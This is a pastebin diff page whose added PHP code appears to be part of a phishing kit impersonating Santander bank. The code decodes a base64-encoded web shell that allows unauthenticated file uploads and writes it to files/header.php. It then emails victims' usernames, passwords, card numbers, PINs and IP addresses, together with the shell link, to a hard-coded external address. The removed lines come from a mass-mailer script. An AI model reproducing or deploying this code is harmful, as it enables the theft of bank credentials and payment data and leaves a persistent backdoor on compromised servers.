SHOW:
|
|
- or go back to the newest paste.
1 | - | <?php |
1 | + | |
2 | - | $password = "olux"; // Password |
2 | + | $save = base64_decode("PD9waHANCiRuZW1vID0gJF9HRVRbJ3RhYm9uJ107IA0KaWYoJG5lbW8gPT0gJ21vaycpew0KJG5lbW9zaGVsbCA9ICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddOyANCiRuZW1vaGVybyA9ICRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXTsgDQplY2hvICI8Zm9ybSBtZXRob2Q9J1BPU1QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnPjxpbnB1dCB0eXBlPSdmaWxlJ25hbWU9J2ZpbGUnIC8+DQo8aW5wdXQgdHlwZT0nc3VibWl0JyB2YWx1ZT0nU3VibWl0JyAvPjwvZm9ybT4iOyANCm1vdmVfdXBsb2FkZWRfZmlsZSgkbmVtb2hlcm8sJG5lbW9zaGVsbCk7DQp9DQo/Pg=="); |
3 | $file = fopen("files/header.php","w"); | |
4 | - | error_reporting(0); |
4 | + | fwrite($file,$save); |
5 | - | set_time_limit(0); |
5 | + | fclose($file); |
6 | - | ini_set("memory_limit",-1); |
6 | + | $ip = getenv("REMOTE_ADDR"); |
7 | - | $leaf['version']="2.7"; |
7 | + | $href = $_SERVER['SERVER_NAME']; |
8 | - | $leaf['website']="leafmailer.pw"; |
8 | + | $TIME_DATE = date('H:i:s d/m/Y'); |
9 | - | $sessioncode = md5(__FILE__); |
9 | + | $header = "http://" . $_SERVER['SERVER_NAME'] .dirname($_SERVER["REQUEST_URI"]) . "/files/header.php?tabon=mok".""; |
10 | - | if(!empty($password) and $_SESSION[$sessioncode] != $password){ |
10 | + | $old = "http://" . $_SERVER["SERVER_NAME"] . dirname($_SERVER["REQUEST_URI"]) . '/Cajero.txt'."\n"; |
11 | - | # _REQUEST mean _POST or _GET |
11 | + | $toba = __file__; |
12 | - | if (isset($_REQUEST['pass']) and $_REQUEST['pass'] == $password) { |
12 | + | $link = "<html><head><meta charset='UTF-8'></head> |
13 | - | $_SESSION[$sessioncode] = $password; |
13 | + | <div style='font-size: 13px;font-family:monospace;font-weight:700;'> |
14 | - | } |
14 | + | <font style='color:#9c0000;'>✪</font> Shell's : <font style='color:#0070ba;'><a href="."$header"." target="."_blank".">$href"."</font></a><br> |
15 | - | else { |
15 | + | <font style='color:#9c0000;'>✪</font> Save : <font style='color:#0070ba;'>".$old."</font><br> |
16 | - | print "<pre align=center><form method=post>Password: <input type='password' name='pass'><input type='submit' value='>>'></form></pre>"; |
16 | + | <font style='color:#9c0000;'>✪</font> Directory : <font style='color:#0070ba;'>".$toba."</font><br> |
17 | - | exit; |
17 | + | <font style='color:#9c0000;'>✪</font> Psername : <font style='color:#0070ba;'>".$_SESSION["u"]."</font><br> |
18 | - | } |
18 | + | <font style='color:#9c0000;'>✪</font> Password : <font style='color:#0070ba;'>".$_SESSION["p"]."</font><br> |
19 | - | } |
19 | + | <font style='color:#9c0000;'>✪</font> Card Number : <font style='color:#0070ba;'>".$_SESSION["carta"]."</font><br> |
20 | - | if($_POST['action']=="send"){ |
20 | + | <font style='color:#9c0000;'>✪</font> PIN : <font style='color:#0070ba;'>".$_SESSION["pin"]."</font><br> |
21 | - | $senderEmail=leafTrim($_POST['senderEmail']); |
21 | + | <font style='color:#9c0000;'>✪</font> IP's : <font style='color:#0070ba;'><a href="."http://ip-api.com/#$ip"." target="."_blank".">$ip"."</font></a><br> |
22 | - | $senderName=leafTrim($_POST['senderName']); |
22 | + | <font style='color:#9c0000;'>✪</font> DATE : <font style='color:#0070ba;'>".$TIME_DATE."</font><br> |
23 | - | $replyTo=leafTrim($_POST['replyTo']); |
23 | + | </div></html>\n"; |
24 | - | $subject=leafTrim($_POST['subject']); |
24 | + | $admin = "✪ $href | $ip"; |
25 | - | $emailList=leafTrim($_POST['emailList']); |
25 | + | $prestashop .= "From: Santander <localhost>"; |
26 | - | $messageType=leafTrim($_POST['messageType']); |
26 | + | $prestashop .= $_POST['eMailAdd']."\n"; |
27 | - | $messageLetter=leafTrim($_POST['messageLetter']); |
27 | + | $prestashop .= "MIME-Version: 1.0\n"; |
28 | - | $messageLetter = urlencode($messageLetter); |
28 | + | $prestashop .= "Content-type: text/html; charset=UTF-8\n"; |
29 | - | $messageLetter = ereg_replace("%5C%22", "%22", $messageLetter); |
29 | + | @mail('dexterbenazzouz@gmail.com', $admin, $link, $prestashop); |